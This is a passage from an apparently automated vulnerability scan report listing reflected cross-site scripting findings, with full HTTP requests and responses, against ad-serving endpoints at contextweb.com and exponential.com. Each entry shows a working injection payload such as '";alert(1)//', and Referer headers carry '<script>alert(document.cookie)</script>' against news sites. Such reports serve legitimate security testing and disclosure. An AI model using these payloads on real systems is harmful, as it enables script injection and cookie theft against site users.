Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB31
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: -1380734480
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4886
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:32 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="5131023768c";alert(1)//bab2d4aa7b";var ct="50151";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl"
...[SNIP]...

4.742. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e45c"%3balert(1)//19ca24f69bd was submitted in the cwpnet parameter. This input was echoed as 7e45c";alert(1)//19ca24f69bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=17e45c"%3balert(1)//19ca24f69bd&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: -516785157
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:36 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="17e45c";alert(1)//19ca24f69bd";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else var cwfl=_cww.cwfl;if(typeof(cwif)==_cwu)var cwif=
...[SNIP]...

4.743. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1edbc"%3balert(1)//e4a6c8ea835 was submitted in the cwrun parameter. This input was echoed as 1edbc";alert(1)//e4a6c8ea835 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=2001edbc"%3balert(1)//e4a6c8ea835&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 400078144
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:31 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250";var ca="VIEWAD";var cr="2001edbc";alert(1)//e4a6c8ea835";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else var cwfl=_cww
...[SNIP]...

4.744. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a3b"%3balert(1)//bb32770019f was submitted in the cwtagid parameter. This input was echoed as c1a3b";alert(1)//bb32770019f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151c1a3b"%3balert(1)//bb32770019f HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB28
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 767372036
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151c1a3b";alert(1)//bb32770019f";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww
...[SNIP]...

4.745. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2db2f"%3balert(1)//aecfa14c61f was submitted in the cwwidth parameter. This input was echoed as 2db2f";alert(1)//aecfa14c61f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=3002db2f"%3balert(1)//aecfa14c61f&cwheight=250&cwpnet=1&cwtagid=50151 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 04 Jan 2011 15:48:05 GMT
ETag: 1713931250
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4887
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:35 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="513102";var ct="50151";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="3002db2f";alert(1)//aecfa14c61f";var ch="250";var cn="1";var cads="0";var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl="cwl";if(typeof(_cww.cwfl)==_cwu)var cwfl=false;else var cwfl=_cww.cwfl;if(type
...[SNIP]...

4.746. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tags.expo9.exponential.com
Path:	/tags/NYDailyNewscom/ROS/tags.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5152<a>ba673f094d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/NYDailyNewscomc5152<a>ba673f094d9/ROS/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:02:01 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:02:01 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11791

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "nydailynewscomc5152<a>ba673f094d9";
t.adSpace = "ros";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/dis
...[SNIP]...

4.747. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tags.expo9.exponential.com
Path:	/tags/NYDailyNewscom/ROS/tags.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5700a<a>8b3bde82dda was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/NYDailyNewscom/ROS5700a<a>8b3bde82dda/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:02:33 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:02:33 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11791

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "nydailynewscom";
t.adSpace = "ros5700a<a>8b3bde82dda";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

4.748. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tags.expo9.exponential.com
Path:	/tags/NYDailyNewscom/ROS/tags.js/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d5b3<a>768ed47794e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/NYDailyNewscom6d5b3<a>768ed47794e/ROS/tags.js/ HTTP/1.1
Host: tags.expo9.exponential.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 150
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:06:19 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:06:19 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Content-Encoding: none
Content-Length: 11791
Connection: Close

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "nydailynewscom6d5b3<a>768ed47794e";
t.adSpace = "ros";
t.tagKey = "1167608151";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/dis
...[SNIP]...

4.749. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tags.expo9.exponential.com
Path:	/tags/NYDailyNewscom/ROS/tags.js/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a669b<a>5da8e281ab5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/NYDailyNewscom/ROSa669b<a>5da8e281ab5/tags.js/ HTTP/1.1
Host: tags.expo9.exponential.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 150
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:06:17 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:06:17 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Content-Encoding: none
Content-Length: 11791
Connection: Close

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "nydailynewscom";
t.adSpace = "rosa669b<a>5da8e281ab5";
t.tagKey = "1167608151";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

4.750. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tags.expo9.exponential.com
Path:	/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 673af<a>2763f6655df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/RubiconProjectAudienceExtensionMB673af<a>2763f6655df/Segment4/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:01:50 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:01:50 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11815

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "rubiconprojectaudienceextensionmb673af<a>2763f6655df";
t.adSpace = "segment4";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+
...[SNIP]...

4.751. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tags.expo9.exponential.com
Path:	/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f4262<a>a950a36cf07 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/RubiconProjectAudienceExtensionMB/Segment4f4262<a>a950a36cf07/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:02:32 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:02:32 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11815

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "rubiconprojectaudienceextensionmb";
t.adSpace = "segment4f4262<a>a950a36cf07";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

4.752. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tags.expo9.exponential.com
Path:	/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d9af<a>a3ba9bc2a48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/RubiconProjectAudienceExtensionMB6d9af<a>a3ba9bc2a48/Segment4/tags.js/ HTTP/1.1
Host: tags.expo9.exponential.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 150
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:06:20 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:06:20 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Content-Encoding: none
Content-Length: 11815
Connection: Close

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "rubiconprojectaudienceextensionmb6d9af<a>a3ba9bc2a48";
t.adSpace = "segment4";
t.tagKey = "1167608151";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+
...[SNIP]...

4.753. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tags.expo9.exponential.com
Path:	/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/

Issue detail

